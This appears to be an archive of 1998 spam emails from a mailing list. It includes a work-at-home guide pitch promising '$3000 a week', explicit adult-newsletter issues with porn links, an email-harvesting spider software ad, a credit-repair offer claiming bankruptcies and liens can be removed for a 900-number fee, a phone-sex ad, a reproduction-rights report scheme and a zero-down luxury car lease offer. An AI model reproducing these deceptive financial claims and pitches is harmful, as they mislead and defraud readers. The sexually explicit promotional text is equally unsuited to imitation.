Get Your First Check in as Little as a Week!</I>
<FONT SIZE=2><FONT COLOR="#000000">
     Hi, my name is Brian Crawford, and I have tried just about every work- 
at-home opportunity out there, from stuffing envelopes to assembling 
miniatures. Most of them turned out to be nothing more than a waste
of time and money. However, among all the scams and rip-offs, I did
come across many legitimate companies willing to pay for my services.

     I started to think, "Why doesn't someone just keep track of all the 
honest companies so that no one else would need to get ripped off
when trying to find a decent work-at-home job?" I decided to do just 
that.
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
Throw Away That Junk Mail!
<FONT COLOR="#000000"><FONT SIZE=2></I>
     See, the reason most of us encounter problems is because we usually
look for these jobs by responding to junk mail. Let me ask you, when was 
the last time an employer sent you a job offering in the mail? Probably never!
You had to look for the job yourself, and it is exactly the same with 
work-at-home positions. The companies are out there, but you need to look 
for them. That is where my book "The Home Workers Survival Guide" really 
comes in handy.
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
Over 200 Companies Waiting to Hear from You!
<FONT COLOR="#000000"><FONT SIZE=2></I>
     In chapter three, you will find page after page of job listings for all
kinds of work. Find something you like, and then contact them at the 
address listed. You could be on your way to a great paying at-home 
job for the cost of a stamp. Never send in $20-$30 for a bogus 
"processing fee" again! Anyone in the U.S. can work- no one is
refused.
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
What Do You Like To Do?
<FONT COLOR="#000000"><FONT SIZE=2></I>
What kind of work are you looking for? It's all here!

-Sewing baby clothing
-Building doll houses
-Crafts of every kind
-Assembling holiday decorations
-Painting
-Circular Mailing
-Food/game/software testers
-Baking (Yes, get paid to cook!)
-Health products/food/jewelery
-Plus many, many more opportunities
 including distributorships and sales

     All of these opportunities are available to anyone- no experience
is needed. Just contact the listing that interests you and you can
get started right away. These companies offer legitimate work and will 
be happy to send you full information before you make a decision. 
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
Watch Out For Scams!
<FONT COLOR="#000000"><FONT SIZE=2></I>
     Chapter four will let you in on some of the most common work-at
home scams. Make sure you read this. If you come across something
that sounds too good to be true, remember- it probably is. Here are
just two quick examples of information found in this chapter.

1.<FONT COLOR="#ff0000"> "Assemble Miniatures"<FONT COLOR="#000000"> If a company requires a large deposit or
registration fee to get started but promises great pay, be careful. Most 
legitimate companies will charge only a small fee for the supplies they 
send you, and wil pay you a reasonable amount as well. After sending
in a large payment, you may find that the company will call your
finished work "inferior" and refuse to pay you. They were only after 
your registraion fee, and probably never intended on paying you. 

2. <FONT COLOR="#ff0000">"Stuff Envelopes"<FONT COLOR="#000000"> Nobody is going to pay you a dollar or even 50
cents to stuff an envelope. There are machines that can stuff
thousands of envelopes a day for only pennies. What these companies 
should really tell you is that you will be mailing junk advertisements 
for them. They expect you to place an ad in your local newspaper 
offering "Home Workers Needed". You only get the "dollar per 
envelope" when people actually reply to this ad!
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
Are They All Bogus?
<FONT COLOR="#000000"><FONT SIZE=2></I>
     Like I said before, there are a lot of dishonest companies out there 
looking to take your money, but not all of them are like that. We list 
over 40 companies offering assembly work, from toys to clothes to 
weaving rattan. Choose the kind of work you like and write to the 
companies who offer it. Ask them any questions you have BEFORE 
you send in any money or buy any supplies. 

     There are also several companies out there that will pay you a 
substantial commission for mailing their advertisements, and you 
won't have to pay them anything to be able to do it, just contact them 
and ask!
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
     Need Cash Fast?
48 Hours Soon Enough?
<FONT COLOR="#000000"><FONT SIZE=2></I>
     When you get the book, look over the many excellent opportunities.
Each listing includes a brief description of what is offered. Write to the 
companies you like and request an application form. They have 
openings right now, and they'll be happy to get you started.  

     You can begin to make money even faster if you choose one of the 
programs or plans that the book describes in detail. I'll tell you 
everything you need to know to get started. By taking a few simple 
steps, you can already be making money just 48 hours after you receive 
the book.
<FONT COLOR="#0000ff"><FONT SIZE=3><I>
How Much Is This Going To Cost Me?
<FONT COLOR="#000000"><FONT SIZE=2></I>
     "The Home Workers Survival Guide" costs just $29.95 plus $3.00
pastage and handling. I'm so sure this book will help you find
legitimate work that I am backing it by an unconditional guarantee. If 
for ANY reason you do not feel the book helped you earn enough extra 
income, simply return it for a full refund, including postage and tax. 
What's better is that this rock-solid guarantee is good for two full 
months, which allows you to really look it over and check out the 
opportunities.

     You deserve to feel the joy of getting huge weekly paychecks. Please 
complete the order form and mail it today. Everything will be rushed 
to you by first class mail. 

                                                                              
                                                                                        Sincerely, 
                                                                              
                                                                                        <I>Brian Crawford</I>

<FONT COLOR="#ff0000">P.S.<FONT COLOR="#000000"> I've just added some great new information to the book. Some 
people are already making as much as $3000 a week with a new 
program that lets them work in the comfort of their own home. It 
costs nothing to get started and anyone can do it. It's like nothing I 
have ever seen before, and it is sure to make people a lot of money.
Details will be rushed to you along with your book order. 


                          Please Print and Mail This Order Form to: 
cut here
-------------------------------------------------------------------------------------------------
ANP                                                                              #MP11
c/o Brian Crawford                            
P.O. Box 712102 
Santee, CA 92072-2102                    

                      ( ) Yes, I would love to get started immediately. Please
                           rush me "The Home Workers Survival Guide"          
                           under your unlimited two month guarantee. 
                           Enclosed is $29.95 plus $3.00 shipping and 
                           handling.*  $32.95 total.                       

          *Checks may be made payable to ANP


Name____________________________________________ 


Address___________________________________________                            


City, State, Zip_____________________________________    
                                                      Internal Code [E8SB(c)120]
-------------------------------------------------------------------------------------------------
cut here



























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 21 Jan 1998 04:15:28 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Jan 21 '98
Message-ID: <19980121082748.19022.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

UNFAITHFUL
Just once in a while  a brand new site comes along that will
blow your mind,  and Unfaithful  is one of them.  Brought to
you by two  of the biggest  names on the web,  Intertain and
Playgal,  it offers MORE than both sites put together, which
includes  an amazing  3,000 video feeds - yes,  thousands of
hot, streaming videos, many totally live, and some even with
audio too!  With it's FREE trial offer don't miss this site!
Unfaithful ... http://www.unfaithful.com/banner_Eureka0.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
LOOKING FOR *FREE* SMUT? - SEXY SAMANTHA REVEALS ALL!
http://209.50.232.36/sexysam/
I'm Sam and I've searched the web for only the very best
*FREE* adult sites. None of these are preview areas for pay
sites, or adult verification sites. Just surf and find
thousands of the hottest photos, mpegs and audio that you'll
find anywhere on the web!

ANAL LOVING LESBIANS
Up the butt with dildos, fingers and dicks. Three pages with
three thumbnailed images each. Not a bad deal for free! Good
quality,  hot looking brunettes. Double ended dildo fun too!
Anal Loving ......... http://www.anallesbians.com/index.html

MONICA'S HARDESTCORE IMAGES IN THE WORLD
The title makes you interested,  the websites delivers! Some
of the images  here  may  scare  you.  We  are  talking body
piercing in the worst way. Needles in tits, clit rings. Wild
images! .......... http://www.rawpussy.com/hardest/hard.html

IN HER SNATCH OR DOWN HER HATCH?
Click on the above titled link  when  you get there. Then on
the following page at the bottom  you will have two choices.
Snatch or hatch, click on one any your in! In the hatch area
you will find lots of thumbnail  images of hot babes sucking
on one cock or two alone and with another girl. Hot website!
In Her Snatch .......... http://www.darkcorners.com/bedroom/

RACHEL'S RESTROOM
There is a ton of text on  this  website but way down at the
bottom of the page there  are  some  thumbnails of some wild
images. Pussy, panties and  pissing.  You golden shower guys
are in  for a real  treat here.  Checkout  the bridge image.
Rachel's Restroom ................. http://www.restroom.net/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Just 18 ........................ http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
SOPHIA: This blue-eyed beauty will make your heart melt. Not
only is this  Texas  gal  beautiful,  but  she  has  a close
connection to her fans who keep  up with her life by reading
her soap opera, a section  devoted  to her love life. Sophia
is a real sweetheart,  visit  her  now  and  you will not be
sorry!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Very Sexy Erotic Stories: Ready  for  lots  of hot, free sex
stories? Look no further than  Very Sexy Erotic Stories. All
different subjects, all free. ..... http://www.verysexy.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?210
Pic  2 ........................... http://137.39.63.229/?211
Pic  3 ........................... http://137.39.63.229/?212
Pic  4 ........................... http://137.39.63.229/?213
Pic  5 ........................... http://137.39.63.229/?214
Pic  6 ........................... http://137.39.63.229/?215
Pic  7 ........................... http://137.39.63.229/?216
Pic  8 ........................... http://137.39.63.229/?217
Pic  9 ........................... http://137.39.63.229/?218
Pic 10 ........................... http://137.39.63.229/?219

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: saveonaeb5@ix.netcom.com
Date: Wed, 21 Jan 1998 13:44:40 -0800 (PST)
To: Friend@public.com
Subject: Start Your Own Publishing BIZ
Message-ID: <3975100040408.MCW47692@hinsig.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ffff80">CRIME REPORTS
Make Crime Pay!

It Can Pay you up to 1000% Profit!

Become a Publisher---Sell Information about how
to Stop and Guard Against Today's Crime!

Order all 15 reports and receive full reproduction rights. You become the publisher!
You can then have these reports printed and sell them for whatever amount you wish.
Just one small investment and you own a complete ready made mail order business with limitless potential.

<FONT  COLOR="#000000" SIZE=4><I>1. How to Protect Your Home from Intruders
2. How to Protect Yourself on City Streets
3. How to Protect Your Valuables from Theft
4. How to Protect yourself while Traveling
5. How to Guard against Purse Snatchers
6. How to Protect against Armed Robbery
7. How to Protect against Pick-Pocketers
8. How to Safeguard against Rape
9. How Shoplifting affects you and Your Family
10. How to Protect Cars, Bicycles, and Motorcycles
11. How to Protect Your Home While Away
12. How to Burglar Proof Your Home
13. How to Burglar Proof your Windows
14. How to Select a Burglar Alarm
15. How to Reduce Crime in Your Neighborhood<FONT  COLOR="#000000" SIZE=3></I>

<U>SPECIAL BONUS OFFER:</U>

Order all 15 Reports for just $10.00 and you will also receive:
1. Full Reproduction Rights
2. A complete marketing program showing exactly how to sell
these reports to other dealers
3. The right to reproduce this Copyrighted Sales Letter with your own name

Your printer can print these reports for a few cents each. You can sell them for
at least $2.00 each! Or, have all 15 printed for less than the cost of 2 packs of gum. You can sell them as a package---including full reproduction rights---for at least $20! How's that for profit? Or bundle them with other reports you are currently selling to give customers more bang for the buck!
Become a publisher and get into the really Big Money! Don't pass up this opportunity!
Order now..Number of Dealerships is Limited.

</P><P ALIGN=CENTER>Send your check or money order to:
Freelance! Co.
331 West 57th Street
Suite # 340
New York NY 10019
</P><P ALIGN=LEFT>
_______<B>Yes, please send me the complete marketing package of 15 crime reports</B>. I have enclosed <B>$10.00</B> (check/money order) to cover applicable shipping and handling fees. Please rush delivery so that I can get started right away!

Name_____________________________________________________

Address___________________________________________________

City_________________________________State_____Zip__________

Email Address______________________________________________

Tel Number(optional)_________________________________________
<FONT  COLOR="#000000" SIZE=3>
</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webwerx@hotmail.com
Date: Wed, 21 Jan 1998 21:42:45 -0800 (PST)
To: webwerx@hotmail.com
Subject: website advertising and design
Message-ID: <199801220431.XAA09057@eden-backend.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////

WebwerX is a company dedicated to professional and personal website design as well as advertising.  We cater to the small home-based business or personal homepage to the large extensive company's needs.  We offer the most competive rates on the internet.  Our custom graphics artists and programmers will ensure that you have the most up-to-date in web design and artwork.  We offer many features such as javascript, scanned images, animated .gifs, custom backgrounds and pictures, client-side image maps, and much more.  WebwerX is also dedicated to advertising its clients websites on the web.  Choose from an array of advertising options from the small one-time submission to the large in-depth monthly advertising campaign.  Get noticed now on the web.  Don't wait until it is too late.

Thank you,   WebwerX

email us at: webwerx@hotmail.com
visit us at: http://www.hypermart.net/webwerxdesign





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aa8833 <aa8833@ix.netcom.com>
Date: Thu, 22 Jan 1998 00:23:42 -0800 (PST)
To: <cybersurvival@e-oasis.com>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <aa8833@ix.netcom.com>
Subject:  1-22
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 22 Jan 1998 00:53:11 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Jan 22 '98
Message-ID: <19980122081627.13708.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

HE GIRLS!
This site calls itself  "The original She-Male, slut wonder-
land",  and it's hard not to agree.  With multiple live she-
male slut video feeds. Huge numbers of amazing shemale pics,
extra  hot stories  and so much more,  you'll just love this
site. And what's more, we have arranged a special free trial
membership for all Eureka! subscribers.  So go check it out!
HeGirls ... http://207.33.10.198/cgi-bin/gate1/pbm/he_0024/0

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
SINFUL'S 20 FREE XXX PICS
http://www.sinful.net/cgi-bin/topvlog.cgi?eureka
20 FREE HARDCORE, CUMSHOT, GROUPSEX, AND FREE ANALSEX PHOTOS
UPDATED WEEKLY PLUS LINKS TO 700+ FREE ADULT PICTURE SITES.
CATEGORIES INCLUDE: ASIAN, HARDCORE, SOFTCORE, BABES, AND
PIC LINKS. YOU GET ALL OF THIS FOR FREE!! VISIT US NOW!!

PERSIAN KITTY'S ADULT LINKS
The most up to date  listing  of visitor friendly free links 
on the net. Updated twice  daily so there's always something
new. Don't  miss  the  most  recent  feature,  the Panoramic 
Background of the Week. A beautiful  Hi-Rez image for you to
download and use  on  your  desktop.  PK  takes  care of her 
visitors! Get the desktop image, it is really hot! This is a
must  see site.  Bookmark this  baby right now.  We mean it! 
Persian Kitty's ........ http://www.persiankitty.com/pk.html

SEX FROM THE CRAB NEBULA
Cool site!  Venture into  the furthest reaches  of  the four
Galaxies..  Each  Galaxy is  inhabited  by  voracious  alien
females who eat you for breakfast. Fortunately they all look
like Earth's prettiest, naked, hardcore girls.  There are 56
pix with thumbnails and nice graphics. You should boldly go!
Sex From The Crab Nebula ...... http://207.240.121.91/Space/

OSCAR'S HARDCORE LUAU
Grab  your  grass skirt and  head  for  the islands  because
Oscar's throwing a heck of a beach party. A secret tradition
dating back to the early 50's, the Hardcore Luau has finally
hit the internet like a Tsunami.  Oscar's got humour, style,
and a lot of hardcore Hawaii honey pix.  Bookmark him Danno!
Oscar's Hardcore Luau ......... http://www.xstart.com/oscar/

WENDY'S SATIN DOLLS
Wendy's a generous girl. See the dolls get dirty.  They were
fully poseable  in the anal,  bjs,  group sex,  and  lesbian
scenes  that we saw.  Go see the  hot babes at play.  It's a
straight forward  dirty site.  Hot.  Just  how we  like 'em.
Wendy's Satin Doll's ............ http://www.satindolls.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
20vids+Chat .. http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
ASHLEY: This  raven-haired  babe's  initials  are  A.S.S. It
seems she was destined to  be  an exhibitionist, because she
loves to show off! With a  bunch  of FREE picture sets, this
gal is easy on the eyes.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
TabooStories.com: Nasty  alert!  TabooStories.com  gives you
the hardest, nastiest sex stories  on  the net, all free! We
have the stories that the  other  sites  don't dare to post!
Don't say we dindn't warn you.. http://www.taboostories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?220
Pic  2 --------------------------> http://137.39.63.229/?221
Pic  3 --------------------------> http://137.39.63.229/?222
Pic  4 --------------------------> http://137.39.63.229/?223
Pic  5 --------------------------> http://137.39.63.229/?224
Pic  6 --------------------------> http://137.39.63.229/?225
Pic  7 --------------------------> http://137.39.63.229/?226
Pic  8 --------------------------> http://137.39.63.229/?227
Pic  9 --------------------------> http://137.39.63.229/?228
Pic 10 --------------------------> http://137.39.63.229/?229

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trump7@foursssst.com
Date: Thu, 22 Jan 1998 22:21:09 -0800 (PST)
To: you2@internet-wide.com
Subject: Your e-mail sent to me by mistake
Message-ID: <193745610998.DJT09635@twosst.com>
MIME-Version: 1.0
Content-Type: text/plain




Did you know that as many as 70% of all Americans have 
negative or incorrect information on their credit report and that 
one in five complaints to the Federal Trade Commission is 
against Credit Bureaus.


ARE YOU ONE OF THE MILLIONS OF 
AMERICANS REJECTED FOR CREDIT?


If so, we have the information you need:

>Remove negative and incorrect information from your credit report<
* Bankruptcies - REMOVED
* Repossessions - REMOVED
* Tax Liens - REMOVED
* Judgments - REMOVED
* Charge Offs - REMOVED
* Late Payments - REMOVED
 
>>Get all of the credit cards you want<<

>>Obtain a Home mortgage<<

>>Qualify for a car loan<<


Everyone is entitled to a better lifestyle for themselves and their 
family and especially such a basic need as a house, a car, or 
credit cards.  Imagine the thrill of driving home for the first time 
in a new car and showing it to your friends, relatives and neighbors,
or the convenience of having a credit card for making purchases, 
or fulfilling the American dream of owning a Home. 

NOW IT IS POSSIBLE!


All of the information you need is contained in our confidential 
report;

===========================================
"Insider's Guide to Credit Repair Secrets."
===========================================


Best of all, you can have this report RIGHT NOW, delivered 
directly to your e-mail inbox in a matter of minutes. Read 
on for further details.


The "Insider's Guide to Credit Repair Secrets" contains everything 
you need in order to repair your own credit report.  In addition, as 
the title implies, we include some of the industries best kept and 
guarded secrets, things the Credit Bureaus and Banks don't want 
you to know. Don't pay hundreds or perhaps thousands of dollars 
to a credit repair agency. You can do it yourself for FREE, with 
equal or better results. 


===>  BONUS OFFER  <===

The "Insider's Guide to Credit Repair Secrets" normally sells 
for $19.95 and is worth every penny.  However, through a 
special arraignment with the author, we are able to offer the 
report to you for only $9.95.  This is a limited time offer so 
YOU MUST ACT NOW. 

If you order immediately, we will also include the following
two valuable BONUS SECTIONS absolutely FREE:


BONUS SECTION #1 
HOW TO GET A CREDIT CARD OR BANK LOAN

* Shaping your application to improve your chances of 
   being approved
* How creditors rate an application
* Hot tips on how you can stack the odds in your favor
* How to use a co-signer
* How to establish AAA credit in 30 days


BONUS SECTION #2 
TOP 10 WEB SITES FOR FREE 
CREDIT REPAIR & CREDIT CARD INFO

These 10 Web sites are the best of the best. All of them 
are absolutely FREE. They contain additional credit 
repair information, tips on obtaining credit cards and 
loans, databases of hundreds upon hundreds of credit 
card issuers, consumer help on overcoming debt, etc...


BUT THERE'S MORE.............
If you order within 48 hours of receiving this e-mail, we will 
also include absolutely FREE with your purchase, a complete 
copy of the "Fair Credit Reporting Act", word-for-word as
written by the Federal Trade Commission.  Understanding
the "Fair Credit Reporting Act" is the key to enforcing your
rights with regard to negative entries on your credit file.


HOW TO ORDER!!!

To order the "Insider's Guide to Credit Repair Secrets" plus
both BONUS SECTIONS, plus a complete copy of the 
"Fair Credit Reporting Act" all delivered IMMEDIATELY to 
your e-mail inbox, all you need to do is follow these simple steps;

1)  Get a pen and piece of paper ready to write down an 
     important e-mail address.

2)  Call 1-900-448-8901.
    (Your phone bill will be charged $9.95 for this call. 
     If you are under 18 years of age, you must receive 
     parental permission before calling)

3)  Listen to the 900 number recording and write down 
     the e-mail address given.

4)  Send any e-mail message to the address given on the 
     recording and within minutes, the report, along with 
     both BONUS SECTIONS and the "Fair Credit 
     Reporting Act" will be electronically delivered to your 
     e-mail inbox. 


Isn't $9.95 a small price to pay for the convenience of a clean 
credit record and all of the advantages that go along with it. 
Order the "Insider's Guide to Credit Repair Secrets" plus the
two FREE BONUS SECTIONS and the "Fair Credit Reporting
Act" today and start enjoying the credit you deserve.

CALL  1-900-448-8901 NOW.  You will be glad you did!!!


The information supplied in the "Insiders Guide to Credit 
Repair Secrets" is applicable only to United States residents.  
If you have received this e-mail solicitation and live outside 
the United States of America, please accept our apology 
and disregard this message.  Thank you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoilu46@concentric.net
Date: Thu, 22 Jan 1998 22:35:06 -0800 (PST)
To: hoilu46@concentric.net
Subject: Hi !!!
Message-ID: <199801224407XAA38296@post.172.112.2>
MIME-Version: 1.0
Content-Type: text/plain


Hi baby, I'm Christy.

Cum join my girlfriends and I for some Live Erotic Chat!!

We we're so naughty they banned us from the U.S.A!!!!

We're so hot and horny we can't wait to get it on with you!!

Call us at, 011-378-656-346. That's 011-378-656-346!!

We'll be waiting .......

International rates apply. You be 18 or older to use this service.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 59528925@aol.com
Date: Fri, 23 Jan 1998 00:29:44 -0800 (PST)
To: It'sTheLease@WeCanDo.com
Subject: NEED A BRAND NEW CAR???
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ffff00"></P><P ALIGN=CENTER><FONT  COLOR="#8000ff" SIZE=4><U><B><I>
</FONT><FONT  COLOR="#0080c0" BACK="#ffff00" SIZE=4>CAN YOU IMAGINE DRIVING THE CAR OF YOUR DREAMS!!!</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></U></B></I>
</P><P ALIGN=LEFT>
</P><P ALIGN=CENTER><FONT  COLOR="#000000" SIZE=4><B><I>Introducing The Deal Of The Decade!!
Where Your Dream Car Is Now A Reality!!<FONT  COLOR="#000000" SIZE=3></I>

For a ZERO($0.00) Down Payment....

And just $100 Per/Month.....
<FONT  COLOR="#000000" BACK="#ff0000" SIZE=3><I>($395 Yearly Membership Fee)</FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B></I>
</P><P ALIGN=LEFT>
</P><P ALIGN=CENTER><B>You Can Drive Away In A Brand New Car 
Of Your Dreams Ranging In Price From $12,000....
 
<FONT  COLOR="#000000" SIZE=4>To As High As $350,000 or More!!!<FONT  COLOR="#000000" SIZE=3>

<FONT  COLOR="#000000" BACK="#8080ff" SIZE=4><I>*** Does A Convertible Bentley Rolls Royce Ring A Bell!!!***

</FONT><FONT  COLOR="#000000" BACK="#ffff00" SIZE=3>************************************************************************************************
<FONT  COLOR="#000000" SIZE=4>***BELIEVE IT OR NOT THE SKY IS NOT THE ONLY LIMIT***<FONT  COLOR="#000000" SIZE=3>
*****************************************************************************************</FONT><FONT  COLOR="#8000ff" BACK="#FFFFFF" SIZE=3></I>
</FONT><FONT  COLOR="#000000" SIZE=3>
No Matter What Make or Model You Choose 
For Your Brand New Dream Car....

<FONT  COLOR="#ff0000" SIZE=3>=========================================
***I REPEAT**I REPEAT***I REPEAT***I REPEAT***
=========================================</FONT><FONT  COLOR="#000000" SIZE=3>

YOUR DOWN PAYMENT WILL STILL BE ZERO($0.00)!!!

YOUR MONTHLY PAYMENT WILL STILL BE ONLY $100!!!
